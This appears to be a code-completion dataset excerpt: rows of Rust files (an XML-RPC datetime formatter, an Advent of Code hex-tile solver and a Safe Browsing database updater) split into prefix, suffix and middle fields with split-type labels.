/// Note that XML-RPC is extremely underspecified when it comes to datetime values. Apparently,
/// some clients [don't even support timezone information][wp-bug] (we do). For maximum
/// interoperability, this will omit fractional time and time zone if not specified.
///
/// [wp-bug]: https://core.trac.wordpress.org/ticket/1633#comment:4
pub fn format_datetime(date_time: &DateTime) -> String {
let Time {
hour,
minute,
second,
millisecond,
tz_offset_hours,
tz_offset_minutes,
} = date_time.time;
match date_time.date {
Date::YMD { year, month, day } => {
// The base format is based directly on the example in the spec and should always work:
let mut string = format!(
"{:04}{:02}{:02}T{:02}:{:02}:{:02}",
year, month, day, hour, minute, second
);
// Only append milliseconds when they're >0
if millisecond > 0 {
write!(string, ".{:.3}", millisecond).unwrap();
}
// Only append time zone info if the offset is specified and not 00:00
if tz_offset_hours!= 0 || tz_offset_minutes!= 0 {
write!(
string,
"{:+03}:{:02}",
tz_offset_hours,
tz_offset_minutes.abs()
)
.unwrap();
}
string
}
// Other format are just not supported at all:
Date::Week {.. } | Date::Ordinal {.. } => unimplemented!(),
}
}
#[cfg(test)]
mod tests {
use super::*;
use iso8601;
#[test]
fn formats_datetimes() {
let date_time = iso8601::datetime("2016-05-02T06:01:05-0830").unwrap();
let formatted = format_datetime(&date_time);
assert_eq!(formatted, "20160502T06:01:05-08:30");
assert_eq!(iso8601::datetime(&formatted).unwrap(), date_time);
// milliseconds / fraction
let date_time = iso8601::datetime("20160502T06:01:05.400").unwrap();
let formatted = format_datetime(&date_time);
assert_eq!(formatted, "20160502T06:01:05.400");
assert_eq!(iso8601::datetime(&formatted).unwrap(), date_time);
// milliseconds / fraction + time zone
let date_time = iso8601::datetime("20160502T06:01:05.400+01:02").unwrap();
let formatted = format_datetime(&date_time);
assert_eq!(formatted, "20160502T06:01:05.400+01:02");
assert_eq!(iso8601::datetime(&formatted).unwrap(), date_time);
}
|
}
|
random_line_split
|
|
utils.rs
|
use iso8601::{Date, DateTime, Time};
use xml::escape::escape_str_pcdata;
use std::borrow::Cow;
use std::fmt::Write;
/// Escape a string for use as XML characters.
///
/// The resulting string is *not* suitable for use in XML attributes, but XML-RPC doesn't use those.
pub fn escape_xml(s: &str) -> Cow<'_, str>
|
/// Formats a `DateTime` for use in XML-RPC.
///
/// Note that XML-RPC is extremely underspecified when it comes to datetime values. Apparently,
/// some clients [don't even support timezone information][wp-bug] (we do). For maximum
/// interoperability, this will omit fractional time and time zone if not specified.
///
/// [wp-bug]: https://core.trac.wordpress.org/ticket/1633#comment:4
pub fn format_datetime(date_time: &DateTime) -> String {
let Time {
hour,
minute,
second,
millisecond,
tz_offset_hours,
tz_offset_minutes,
} = date_time.time;
match date_time.date {
Date::YMD { year, month, day } => {
// The base format is based directly on the example in the spec and should always work:
let mut string = format!(
"{:04}{:02}{:02}T{:02}:{:02}:{:02}",
year, month, day, hour, minute, second
);
// Only append milliseconds when they're >0
if millisecond > 0 {
write!(string, ".{:.3}", millisecond).unwrap();
}
// Only append time zone info if the offset is specified and not 00:00
if tz_offset_hours!= 0 || tz_offset_minutes!= 0 {
write!(
string,
"{:+03}:{:02}",
tz_offset_hours,
tz_offset_minutes.abs()
)
.unwrap();
}
string
}
// Other format are just not supported at all:
Date::Week {.. } | Date::Ordinal {.. } => unimplemented!(),
}
}
#[cfg(test)]
mod tests {
use super::*;
use iso8601;
#[test]
fn formats_datetimes() {
let date_time = iso8601::datetime("2016-05-02T06:01:05-0830").unwrap();
let formatted = format_datetime(&date_time);
assert_eq!(formatted, "20160502T06:01:05-08:30");
assert_eq!(iso8601::datetime(&formatted).unwrap(), date_time);
// milliseconds / fraction
let date_time = iso8601::datetime("20160502T06:01:05.400").unwrap();
let formatted = format_datetime(&date_time);
assert_eq!(formatted, "20160502T06:01:05.400");
assert_eq!(iso8601::datetime(&formatted).unwrap(), date_time);
// milliseconds / fraction + time zone
let date_time = iso8601::datetime("20160502T06:01:05.400+01:02").unwrap();
let formatted = format_datetime(&date_time);
assert_eq!(formatted, "20160502T06:01:05.400+01:02");
assert_eq!(iso8601::datetime(&formatted).unwrap(), date_time);
}
}
|
{
escape_str_pcdata(s)
}
|
identifier_body
|
day24.rs
|
use std::collections::HashMap;
use std::collections::HashSet;
use std::io::Read;
use std::mem::swap;
use crate::common::Lines;
use crate::Solution;
type Pos = (i32, i32);
const DIRECTIONS: [Pos; 6] = [(-2, 0), (2, 0), (-1, -1), (-1, 1), (1, -1), (1, 1)];
fn convert_pos(s: &str) -> Pos {
let mut s = s.chars();
let mut x = 0;
let mut y = 0;
while let Some(c) = s.next() {
match c {
'e' => x += 2,
'w' => x -= 2,
'n' |'s' => {
if c == 'n' {
y += 1;
} else {
y -= 1;
}
match s.next() {
Some('e') => x += 1,
Some('w') => x -= 1,
_ => panic!(),
}
}
_ => panic!(),
}
}
(x, y)
}
fn step(current: &HashSet<Pos>, target: &mut HashSet<Pos>) {
let mut black_count: HashMap<Pos, u32> = current.iter().map(|&pos| (pos, 0)).collect();
for &(x, y) in current {
for &(dx, dy) in &DIRECTIONS {
let pos = (x + dx, y + dy);
*black_count.entry(pos).or_default() += 1;
}
}
target.clear();
for (pos, neighbours) in black_count {
let is_black = current.contains(&pos);
let going_black = match neighbours {
1 | 2 if is_black => true,
2 if!is_black => true,
_ => false,
};
if going_black {
target.insert(pos);
}
}
}
fn
|
(input: &mut dyn Read) -> HashSet<Pos> {
let mut black = HashSet::new();
for line in Lines::new(input) {
let pos = convert_pos(&line);
if!black.insert(pos) {
black.remove(&pos);
}
}
black
}
#[derive(Default)]
pub struct Day24;
impl Solution for Day24 {
fn part1(&mut self, input: &mut dyn Read) -> String {
get_black_tiles(input).len().to_string()
}
fn part2(&mut self, input: &mut dyn Read) -> String {
let mut state = get_black_tiles(input);
let mut scratch_pad = state.clone();
for _ in 0..100 {
step(&state, &mut scratch_pad);
swap(&mut state, &mut scratch_pad);
}
state.len().to_string()
}
}
#[cfg(test)]
mod tests {
use crate::test_implementation;
use super::*;
const SAMPLE: &[u8] = include_bytes!("../samples/24.txt");
#[test]
fn test_convert_pos() {
assert_eq!((1, -1), convert_pos("esew"));
assert_eq!((0, 0), convert_pos("nwwswee"));
}
#[test]
fn test_step() {
let state = get_black_tiles(&mut SAMPLE.clone());
let mut target = state.clone();
step(&state, &mut target);
assert_eq!(15, target.len());
}
#[test]
fn sample_part1() {
test_implementation(Day24, 1, SAMPLE, 10);
}
#[test]
fn sample_part2() {
test_implementation(Day24, 2, SAMPLE, 2208);
}
}
|
get_black_tiles
|
identifier_name
|
day24.rs
|
use std::collections::HashMap;
use std::collections::HashSet;
use std::io::Read;
use std::mem::swap;
use crate::common::Lines;
use crate::Solution;
type Pos = (i32, i32);
const DIRECTIONS: [Pos; 6] = [(-2, 0), (2, 0), (-1, -1), (-1, 1), (1, -1), (1, 1)];
fn convert_pos(s: &str) -> Pos {
let mut s = s.chars();
let mut x = 0;
let mut y = 0;
while let Some(c) = s.next() {
match c {
'e' => x += 2,
'w' => x -= 2,
'n' |'s' => {
if c == 'n' {
y += 1;
} else {
y -= 1;
}
match s.next() {
Some('e') => x += 1,
Some('w') => x -= 1,
_ => panic!(),
}
}
_ => panic!(),
}
}
(x, y)
}
fn step(current: &HashSet<Pos>, target: &mut HashSet<Pos>) {
let mut black_count: HashMap<Pos, u32> = current.iter().map(|&pos| (pos, 0)).collect();
for &(x, y) in current {
for &(dx, dy) in &DIRECTIONS {
let pos = (x + dx, y + dy);
*black_count.entry(pos).or_default() += 1;
}
}
target.clear();
for (pos, neighbours) in black_count {
let is_black = current.contains(&pos);
let going_black = match neighbours {
1 | 2 if is_black => true,
2 if!is_black => true,
_ => false,
};
if going_black {
target.insert(pos);
}
}
}
fn get_black_tiles(input: &mut dyn Read) -> HashSet<Pos> {
let mut black = HashSet::new();
for line in Lines::new(input) {
let pos = convert_pos(&line);
if!black.insert(pos) {
black.remove(&pos);
}
}
black
}
#[derive(Default)]
pub struct Day24;
impl Solution for Day24 {
fn part1(&mut self, input: &mut dyn Read) -> String {
get_black_tiles(input).len().to_string()
}
fn part2(&mut self, input: &mut dyn Read) -> String {
let mut state = get_black_tiles(input);
let mut scratch_pad = state.clone();
for _ in 0..100 {
step(&state, &mut scratch_pad);
swap(&mut state, &mut scratch_pad);
}
state.len().to_string()
}
}
#[cfg(test)]
mod tests {
use crate::test_implementation;
use super::*;
const SAMPLE: &[u8] = include_bytes!("../samples/24.txt");
#[test]
fn test_convert_pos() {
assert_eq!((1, -1), convert_pos("esew"));
assert_eq!((0, 0), convert_pos("nwwswee"));
}
#[test]
fn test_step() {
let state = get_black_tiles(&mut SAMPLE.clone());
let mut target = state.clone();
step(&state, &mut target);
assert_eq!(15, target.len());
}
#[test]
fn sample_part1()
|
#[test]
fn sample_part2() {
test_implementation(Day24, 2, SAMPLE, 2208);
}
}
|
{
test_implementation(Day24, 1, SAMPLE, 10);
}
|
identifier_body
|
day24.rs
|
use std::collections::HashMap;
use std::collections::HashSet;
use std::io::Read;
use std::mem::swap;
use crate::common::Lines;
use crate::Solution;
type Pos = (i32, i32);
const DIRECTIONS: [Pos; 6] = [(-2, 0), (2, 0), (-1, -1), (-1, 1), (1, -1), (1, 1)];
fn convert_pos(s: &str) -> Pos {
let mut s = s.chars();
let mut x = 0;
let mut y = 0;
while let Some(c) = s.next() {
match c {
'e' => x += 2,
'w' => x -= 2,
'n' |'s' => {
|
y -= 1;
}
match s.next() {
Some('e') => x += 1,
Some('w') => x -= 1,
_ => panic!(),
}
}
_ => panic!(),
}
}
(x, y)
}
fn step(current: &HashSet<Pos>, target: &mut HashSet<Pos>) {
let mut black_count: HashMap<Pos, u32> = current.iter().map(|&pos| (pos, 0)).collect();
for &(x, y) in current {
for &(dx, dy) in &DIRECTIONS {
let pos = (x + dx, y + dy);
*black_count.entry(pos).or_default() += 1;
}
}
target.clear();
for (pos, neighbours) in black_count {
let is_black = current.contains(&pos);
let going_black = match neighbours {
1 | 2 if is_black => true,
2 if!is_black => true,
_ => false,
};
if going_black {
target.insert(pos);
}
}
}
fn get_black_tiles(input: &mut dyn Read) -> HashSet<Pos> {
let mut black = HashSet::new();
for line in Lines::new(input) {
let pos = convert_pos(&line);
if!black.insert(pos) {
black.remove(&pos);
}
}
black
}
#[derive(Default)]
pub struct Day24;
impl Solution for Day24 {
fn part1(&mut self, input: &mut dyn Read) -> String {
get_black_tiles(input).len().to_string()
}
fn part2(&mut self, input: &mut dyn Read) -> String {
let mut state = get_black_tiles(input);
let mut scratch_pad = state.clone();
for _ in 0..100 {
step(&state, &mut scratch_pad);
swap(&mut state, &mut scratch_pad);
}
state.len().to_string()
}
}
#[cfg(test)]
mod tests {
use crate::test_implementation;
use super::*;
const SAMPLE: &[u8] = include_bytes!("../samples/24.txt");
#[test]
fn test_convert_pos() {
assert_eq!((1, -1), convert_pos("esew"));
assert_eq!((0, 0), convert_pos("nwwswee"));
}
#[test]
fn test_step() {
let state = get_black_tiles(&mut SAMPLE.clone());
let mut target = state.clone();
step(&state, &mut target);
assert_eq!(15, target.len());
}
#[test]
fn sample_part1() {
test_implementation(Day24, 1, SAMPLE, 10);
}
#[test]
fn sample_part2() {
test_implementation(Day24, 2, SAMPLE, 2208);
}
}
|
if c == 'n' {
y += 1;
} else {
|
random_line_split
|
updater.rs
|
use update_client::*;
use errors::*;
use database::*;
use db_actor::*;
use atoms::*;
use std;
use std::time::Duration;
use std::collections::HashMap;
use std::env;
use std::str;
use std::thread;
use std::sync::atomic::{AtomicBool, AtomicUsize};
use std::sync::{Arc, Mutex};
use chan;
use chan::{Sender, Receiver};
use fibers::{ThreadPoolExecutor, Executor, Spawn};
use futures;
enum CurrentState {
Running,
Stopped,
}
// Using the client, fetches updates periodically, storing the results in a database
pub struct
|
{
update_client: UpdateClient,
db_actor: Sender<Atoms>,
period: u64,
}
impl GSBUpdater {
pub fn begin_processing<H>(api_key: String, db_actor: Sender<Atoms>, executor: H)
where H: Spawn + Clone
{
let (sender, receiver) = chan::async();
executor.spawn(futures::lazy(move || {
let mut updater = GSBUpdater {
update_client: UpdateClient::new(api_key),
db_actor: db_actor,
period: 30 * 60,
};
loop {
let fetch_response = updater.update_client
.fetch()
.send()
.expect("Failed to send fetch request");
let minimum_wait_duration = fetch_response.minimum_wait_duration.clone();
info!("Sending database update");
updater.db_actor
.send(Atoms::Update {
fetch_response: fetch_response,
receipt: sender.clone(),
});
info!("Awaiting db update status");
receiver.recv()
.expect("No one knows this GSBUpdater's name")
.expect("Database failed to update!");
info!("Validating database (JK)");
let backoff = Self::parse_backoff(&minimum_wait_duration)
.expect("Failed to parse backoff")
.unwrap_or(Duration::from_secs(0));
info!("Backoff set to: {:#?}", backoff);
// We have to sleep for the backoff period, or the manual period - whichever is larger
std::thread::sleep(std::cmp::max(backoff, Duration::from_secs(updater.period)));
}
Ok(())
}));
}
pub fn set_period(&mut self, period: u64) {
self.period = period;
}
// Given a string '123.45s' this will parse into a duration of '153'.
// 30 seconds is added to any backoff returned
fn parse_backoff(backoff: &str) -> Result<Option<Duration>> {
if backoff.is_empty() {
Ok(None)
} else {
let point_ix = backoff.find('.').unwrap_or(backoff.len() - 1);
// We know this can't panic because the minimum value of point_ix is 0.
// When the second value to a non inclusive slice is 0, an empty slice is returned.
let backoff = &backoff[..point_ix];
let backoff = try!(backoff.parse::<u64>()
.chain_err(|| "Failed to parse backoff into an integer"));
Ok(Some(Duration::from_secs(backoff + 30)))
}
}
}
|
GSBUpdater
|
identifier_name
|
updater.rs
|
use update_client::*;
use errors::*;
use database::*;
use db_actor::*;
use atoms::*;
use std;
use std::time::Duration;
use std::collections::HashMap;
use std::env;
use std::str;
use std::thread;
use std::sync::atomic::{AtomicBool, AtomicUsize};
use std::sync::{Arc, Mutex};
use chan;
use chan::{Sender, Receiver};
use fibers::{ThreadPoolExecutor, Executor, Spawn};
use futures;
enum CurrentState {
Running,
Stopped,
}
// Using the client, fetches updates periodically, storing the results in a database
pub struct GSBUpdater {
update_client: UpdateClient,
db_actor: Sender<Atoms>,
period: u64,
}
impl GSBUpdater {
pub fn begin_processing<H>(api_key: String, db_actor: Sender<Atoms>, executor: H)
where H: Spawn + Clone
{
let (sender, receiver) = chan::async();
executor.spawn(futures::lazy(move || {
let mut updater = GSBUpdater {
update_client: UpdateClient::new(api_key),
db_actor: db_actor,
period: 30 * 60,
};
loop {
let fetch_response = updater.update_client
.fetch()
.send()
.expect("Failed to send fetch request");
let minimum_wait_duration = fetch_response.minimum_wait_duration.clone();
info!("Sending database update");
updater.db_actor
.send(Atoms::Update {
fetch_response: fetch_response,
receipt: sender.clone(),
});
info!("Awaiting db update status");
receiver.recv()
.expect("No one knows this GSBUpdater's name")
.expect("Database failed to update!");
info!("Validating database (JK)");
let backoff = Self::parse_backoff(&minimum_wait_duration)
.expect("Failed to parse backoff")
.unwrap_or(Duration::from_secs(0));
info!("Backoff set to: {:#?}", backoff);
// We have to sleep for the backoff period, or the manual period - whichever is larger
std::thread::sleep(std::cmp::max(backoff, Duration::from_secs(updater.period)));
}
Ok(())
}));
}
pub fn set_period(&mut self, period: u64) {
self.period = period;
}
// Given a string '123.45s' this will parse into a duration of '153'.
// 30 seconds is added to any backoff returned
|
fn parse_backoff(backoff: &str) -> Result<Option<Duration>> {
if backoff.is_empty() {
Ok(None)
} else {
let point_ix = backoff.find('.').unwrap_or(backoff.len() - 1);
// We know this can't panic because the minimum value of point_ix is 0.
// When the second value to a non inclusive slice is 0, an empty slice is returned.
let backoff = &backoff[..point_ix];
let backoff = try!(backoff.parse::<u64>()
.chain_err(|| "Failed to parse backoff into an integer"));
Ok(Some(Duration::from_secs(backoff + 30)))
}
}
}
|
random_line_split
|
|
updater.rs
|
use update_client::*;
use errors::*;
use database::*;
use db_actor::*;
use atoms::*;
use std;
use std::time::Duration;
use std::collections::HashMap;
use std::env;
use std::str;
use std::thread;
use std::sync::atomic::{AtomicBool, AtomicUsize};
use std::sync::{Arc, Mutex};
use chan;
use chan::{Sender, Receiver};
use fibers::{ThreadPoolExecutor, Executor, Spawn};
use futures;
enum CurrentState {
Running,
Stopped,
}
// Using the client, fetches updates periodically, storing the results in a database
pub struct GSBUpdater {
update_client: UpdateClient,
db_actor: Sender<Atoms>,
period: u64,
}
impl GSBUpdater {
pub fn begin_processing<H>(api_key: String, db_actor: Sender<Atoms>, executor: H)
where H: Spawn + Clone
{
let (sender, receiver) = chan::async();
executor.spawn(futures::lazy(move || {
let mut updater = GSBUpdater {
update_client: UpdateClient::new(api_key),
db_actor: db_actor,
period: 30 * 60,
};
loop {
let fetch_response = updater.update_client
.fetch()
.send()
.expect("Failed to send fetch request");
let minimum_wait_duration = fetch_response.minimum_wait_duration.clone();
info!("Sending database update");
updater.db_actor
.send(Atoms::Update {
fetch_response: fetch_response,
receipt: sender.clone(),
});
info!("Awaiting db update status");
receiver.recv()
.expect("No one knows this GSBUpdater's name")
.expect("Database failed to update!");
info!("Validating database (JK)");
let backoff = Self::parse_backoff(&minimum_wait_duration)
.expect("Failed to parse backoff")
.unwrap_or(Duration::from_secs(0));
info!("Backoff set to: {:#?}", backoff);
// We have to sleep for the backoff period, or the manual period - whichever is larger
std::thread::sleep(std::cmp::max(backoff, Duration::from_secs(updater.period)));
}
Ok(())
}));
}
pub fn set_period(&mut self, period: u64) {
self.period = period;
}
// Given a string '123.45s' this will parse into a duration of '153'.
// 30 seconds is added to any backoff returned
fn parse_backoff(backoff: &str) -> Result<Option<Duration>> {
if backoff.is_empty() {
Ok(None)
} else
|
}
}
|
{
let point_ix = backoff.find('.').unwrap_or(backoff.len() - 1);
// We know this can't panic because the minimum value of point_ix is 0.
// When the second value to a non inclusive slice is 0, an empty slice is returned.
let backoff = &backoff[..point_ix];
let backoff = try!(backoff.parse::<u64>()
.chain_err(|| "Failed to parse backoff into an integer"));
Ok(Some(Duration::from_secs(backoff + 30)))
}
|
conditional_block
|
updater.rs
|
use update_client::*;
use errors::*;
use database::*;
use db_actor::*;
use atoms::*;
use std;
use std::time::Duration;
use std::collections::HashMap;
use std::env;
use std::str;
use std::thread;
use std::sync::atomic::{AtomicBool, AtomicUsize};
use std::sync::{Arc, Mutex};
use chan;
use chan::{Sender, Receiver};
use fibers::{ThreadPoolExecutor, Executor, Spawn};
use futures;
enum CurrentState {
Running,
Stopped,
}
// Using the client, fetches updates periodically, storing the results in a database
pub struct GSBUpdater {
update_client: UpdateClient,
db_actor: Sender<Atoms>,
period: u64,
}
impl GSBUpdater {
pub fn begin_processing<H>(api_key: String, db_actor: Sender<Atoms>, executor: H)
where H: Spawn + Clone
|
updater.db_actor
.send(Atoms::Update {
fetch_response: fetch_response,
receipt: sender.clone(),
});
info!("Awaiting db update status");
receiver.recv()
.expect("No one knows this GSBUpdater's name")
.expect("Database failed to update!");
info!("Validating database (JK)");
let backoff = Self::parse_backoff(&minimum_wait_duration)
.expect("Failed to parse backoff")
.unwrap_or(Duration::from_secs(0));
info!("Backoff set to: {:#?}", backoff);
// We have to sleep for the backoff period, or the manual period - whichever is larger
std::thread::sleep(std::cmp::max(backoff, Duration::from_secs(updater.period)));
}
Ok(())
}));
}
pub fn set_period(&mut self, period: u64) {
self.period = period;
}
// Given a string '123.45s' this will parse into a duration of '153'.
// 30 seconds is added to any backoff returned
fn parse_backoff(backoff: &str) -> Result<Option<Duration>> {
if backoff.is_empty() {
Ok(None)
} else {
let point_ix = backoff.find('.').unwrap_or(backoff.len() - 1);
// We know this can't panic because the minimum value of point_ix is 0.
// When the second value to a non inclusive slice is 0, an empty slice is returned.
let backoff = &backoff[..point_ix];
let backoff = try!(backoff.parse::<u64>()
.chain_err(|| "Failed to parse backoff into an integer"));
Ok(Some(Duration::from_secs(backoff + 30)))
}
}
}
|
{
let (sender, receiver) = chan::async();
executor.spawn(futures::lazy(move || {
let mut updater = GSBUpdater {
update_client: UpdateClient::new(api_key),
db_actor: db_actor,
period: 30 * 60,
};
loop {
let fetch_response = updater.update_client
.fetch()
.send()
.expect("Failed to send fetch request");
let minimum_wait_duration = fetch_response.minimum_wait_duration.clone();
info!("Sending database update");
|
identifier_body
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.